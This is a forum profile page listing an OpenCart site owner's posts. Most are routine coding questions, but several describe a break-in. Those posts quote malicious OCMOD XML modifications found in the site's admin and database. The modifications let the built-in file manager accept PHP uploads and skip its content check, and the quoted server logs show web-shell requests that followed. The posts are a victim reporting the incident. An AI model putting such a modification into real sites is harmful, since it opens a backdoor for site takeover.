Перейти до вмісту
Пошук в
  • Детальніше...
Шукати результати, які ...
Шукати результати в ...

igorfelix

Користувачі
  
  • Публікації

    758
  • З нами

  • Відвідування

1 подписчик

Інформація

  • Стать
    Не определился

Відвідувачі профілю

5 908 переглядів профілю

igorfelix's Achievements

Mentor

Mentor (12/14)

  • Dedicated Rare
  • First Post
  • Collaborator
  • Posting Machine Rare
  • Conversation Starter

Recent Badges

22

Репутація

  1. А может ли бот сбрасывать пароль через админку и каким-то образом проходить кугл капчу с картинками, заходить в админку и устанавливать через менеджер дополнений вирусный модификатор ?
  2. Блокировать по ip ? Так если в админку лезут используя разные ip и vpn.
  3. Странно что ни у кого такого нет. Гуглил. не нашёл. Массовый пробег по сайтам был после 15 апреля 2023.
  4. Проблема повторилась на других сайтах. в БД появляется запись (61, 'File Manager Sort By Upload Date', 'File Manager Sort By Upload Date', 'sezerural.com', '2.x-3.11', '', '<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<modification>\r\n <name>File Manager Sort By Upload Date</name>\r\n <code>File Manager Sort By Upload Date</code>\r\n <version>2.x-3.11</version>\r\n <author>sezerural.com</author>\r\n <file path=\"admin/controller/common/filemanager.php\">\r\n <operation error=\"log\">\r\n <search position=\"replace\"><![CDATA[\'jpeg\',]]></search>\r\n <add><![CDATA[\'php\',\'jpeg\',]]></add>\r\n \r\n \r\n \r\n \r\n </operation> \r\n \r\n <operation error=\"log\">\r\n <search position=\"replace\"><![CDATA[\'image/jpeg\',]]></search>\r\n <add><![CDATA[\'image/jpeg\',\'application/x-php\',]]></add>\r\n \r\n </operation>\r\n \r\n </file> \r\n</modification>\r\n', 1, '2023-04-12 19:05:54'); Опять разрешают заливку php через стандартный менеджер изображений в опенкарте. Устанавливают расширение xml Скорее всего из-за моего простого пароля попали в админку.
  5. Я понял код, в файловый менеджер разрешили загрузку php файлов, и загрузили вирус.
  6. Был замечен сегодня вирус на сайте: не работал переход на страницы, работала только главная. Зашел в файлы, увидел каракули в htaceess, index.php по классике и папки левые.. Снес весь сайт, удалив все файлы, но 3 файла появлялись снова. Смотрел логи, увидел там POST запросы к файлам, но откуда шли так и не нашел, там было пусто. Отключил полностью пользователя на сервере, файлы так и появлись.. Не понимал откуда идет запуск. Хостер не смог помочь, сказал ищите специалиста. Короче удалил учетную запись, залил бэкап, ура 3 файла перестали появляться. Начал думать какой модуль мог заразу принести. Зашел в менеджер дополнений и вижу интересную картину.. На сайте года 2 никаких дополнений не устанавливалось и тут вижу 17 апреля 2023 год что-то не понятное. "SendCloud" версия 2.16. 17.04.2023 захожу в xml а там вот это содержимое : <?xml version="1.0" encoding="UTF-8"?> <modification> <name>SendCloud</name> <version>2.1.6</version> <code>sendcloud</code> <author>SendCloud</author> <link>https://www.sendcloud.com/</link> <!-- Instead of event: catalog/controller/checkout/guest_shipping/save/after --> <file path="admin/controller/common/filemanager.php"> <operation error="skip" info="Detects shipping address change during checkout process (for guest customer)."> <search>$files = glob($directory . '/' . $filter_name . '*.{jpg,jpeg,png,gif,JPG,JPEG,PNG,GIF}', GLOB_BRACE);</search> <add position="replace"> <![CDATA[ $files = glob($directory . '/' . $filter_name . '*.{jpg,jpeg,png,gif,JPG,JPEG,PNG,GIF,php}', GLOB_BRACE); ]]> </add> </operation> <operation error="skip" info="Detects shipping address change during checkout process (for guest customer)."> <search>'jpeg',</search> <add position="after"> <![CDATA[ 'php', ]]> </add> </operation> <operation error="skip" info="Detects shipping address change during checkout process (for guest customer)."> <search>'image/jpeg',</search> <add position="after"> <![CDATA[ 'application/x-php', ]]> </add> </operation> <operation error="skip" info="Detects shipping address change during checkout process (for guest customer)."> <search>$content = file_get_contents($this->request->files['file']['tmp_name']);</search> <add position="replace"> <![CDATA[ $content = ""; ]]> </add> </operation> </file> </modification> Могу еще прислать содержимое файлов которые генерировались.. это файл toggige-arrow.jpg якобы картинка, гуглил - не нашел такого вируса. Подскажите может кто знает, это закинули скрипт который грузит php на сайт ? Начал смотреть гостей кто заходил в админ 17 апреля . 3 айпишника, посмотрел один Въетнам, другой Новосибирск.. April 17, 12:41pm time Moscow 117.2.165.87 Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 April 17, 12:41pm time Moscow 117.2.165.87 Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 April 17, 12:42pm time Moscow 194.87.218.48 python-requests/2.18.4 April 17, 12:43pm time Moscow 117.2.165.87 Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Роботы ? log сайта: Fri Apr 21 10:26:18.501146 2023] [cgi:error] [pid 22408] [client 195.123.242.ЦИФРА:36848] AH01215: 2023-04-21 10:26:18 1ppl9u-0005pS-G7 1ppl9u-0005pS-G7 no recipients found in headers, referer: https://САЙТ/image/catalog/test.php 2023/04/21 10:27:46 [warn] 20983#20983: *43806092 a client request body is buffered to a temporary file /var/cache/nginx/client_temp/0001518096, client: 195.123.242.37, server: САЙТ, request: "POST /image/catalog/test.php HTTP/1.1", host: "САЙТ", referrer: "https://САЙТ/image/catalog/test.php" [Fri Apr 21 10:29:32.865527 2023] [cgi:error] [pid 23023] [client 195.123.242.ЦИФРА:37492] AH01215: PHP Notice: Undefined variable: _GET in /var/www/путь/data/www/САЙТ/image/catalog/inputs.php on line 1 2023/04/21 10:30:30 [warn] 20983#20983: *43806920 a client request body is buffered to a temporary file /var/cache/nginx/client_temp/0001518114, client: 173.208.153.ЦИФРА, server: САЙТ, request: "POST /image/catalog/inputs.php HTTP/1.1", host: "САЙТ", referrer: "https://www.google.com/" 2023/04/21 10:34:56 [warn] 20983#20983: *43807668 a client request body is buffered to a temporary file /var/cache/nginx/client_temp/0001518127, client: 173.208.153.ЦИФРА, server: САЙТ, request: "POST /catalog/model/localisation/localisation/index.php HTTP/1.1", host: "САЙТ", referrer: "https://www.google.com/" Видимо на сайте стоял простой пароль и смогли подобрать, зайди в менеджер дополнений и загрузить xml. А проявился вирус 21 апреля.
  7. foreach ($results as $result) { $youtube = false; if ($result['link']) { // Извлечение идентификатора видео из ссылки на YouTube preg_match('/v=([\w-]{11})/', $result['link'], $matches); if(isset($matches[1]) && $matches[1] != ''){ $youtube = $matches[1]; $filename = 'youtube_' . $youtube . '_mqdefault.jpg'; $filepath = DIR_IMAGE . $filename; // Сохранение превью-изображения на сервере, если оно еще не сохранено. РАБОТАЕТ, картинки скачиваются с ютуба. if (!is_file($filepath)) { file_put_contents($filepath, file_get_contents('https://img.youtube.com/vi/' . $youtube . '/mqdefault.jpg')); } // Ресайз изображения НЕ РАБОТАЕТ, создаются пустые картинки. $thumb_youtube = $this->model_tool_image->resize2($filepath, 320, 250); // Сохранение обрезанного изображения на сервере $thumb_youtube_path = DIR_IMAGE . 'thumb_youtube_' . $youtube . '_mqdefault.jpg'; copy($thumb_youtube, $thumb_youtube_path); } } if (is_file(DIR_IMAGE . $result['image'])) { $data['banners'][] = array( 'title' => $result['title'], 'link' => $youtube ? $youtube : $result['link'], 'thumb' => $this->model_tool_image->resize2($result['image'], 320, 250), 'thumb_youtube' => './image/thumb_youtube_' . $youtube . '_mqdefault.jpg', 'image' => './image/'.$result['image'], ); } } Делаю в модуле slideshow.php (opencart 2.3) костыль в баннере, что бы показывать видео с ютуба, указав ссылку. Осталось превью что б ресайзились под нужный мне размер. А так картинки закачиваются на сервер это работает, осталось только их обрезать, но не получается, где то ошибка в коде..
  8. Хотел снести хеадер, сделать свой для определенных страниц, другую шапку сайта. вот думал ковырять information схему или как то свою создать и со своим контроллером.
  9. Подскажите, можно ли сделать свой файл information_2.php для information_2.tpl ? (статьи) (хотел убрать лишние классы.. и немного переделать..)
  10. Сделал так, работает: //шорткоды $matches = array(); preg_match_all('/\[(.*?)\\]/s', $data['description'], $matches); foreach ($matches[1] as $match) { $snippet_txt = '$phone'; $data['description'] = str_replace($snippet_txt, '<b>+7999-999-99</b>', $data['description']); } //шорткоды Подскажите, как сделать правильно еще одно $phone_2, и $phone_3
  11. Подскажите пожалуйста, в стандартные статьи опенкарта 2.3 хочу в тексте вставлять свои шорткоды, например [[phone]] или кусочек html кода заготовленного, как это организовать в контроллере /catalog/controller/information/information.php
  12. Как вообще у многих устроено? "Поиск картинок или быстрая загрузка картинок для товаров" - Хочется быстро наполнять товары картинками. По прямой ссылке или искать через встроенный поиск.
  13. Здравствуйте, хочу в категории сделать вывод несколько цен, просто для наглядности в category.php указываю 'price' => $price, 'price_1' => $price*0.8, 'price_2' => $price*0.75, 'price_3' => $price*0.7, 'price_4' => $price*0.65, в шаблоне category.tpl указываю: Базовая цена - <span><?php echo $product['price']; ?></span><br> от 10 000 руб - <span><?php echo $product['price_1']; ?> руб.</span><br> от 25 000 руб - <span><?php echo $product['price_2']; ?> руб.</span><br> от 50 000 руб - <span><?php echo $product['price_3']; ?> руб.</span><br> от 100 000 руб - <span><?php echo $product['price_4']; ?> руб.</span><br> Если цена товара например 800 руб, то все ок выводится как надо. но если главная цена товара 22683 руб, то выводится: от 10 000 руб - 17.6 руб. от 25 000 руб - 16.5 руб. от 50 000 руб - 15.4 руб. от 100 000 руб - 14.3 руб. пропадают нули.
×
×
  • Створити...

Important Information

На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність.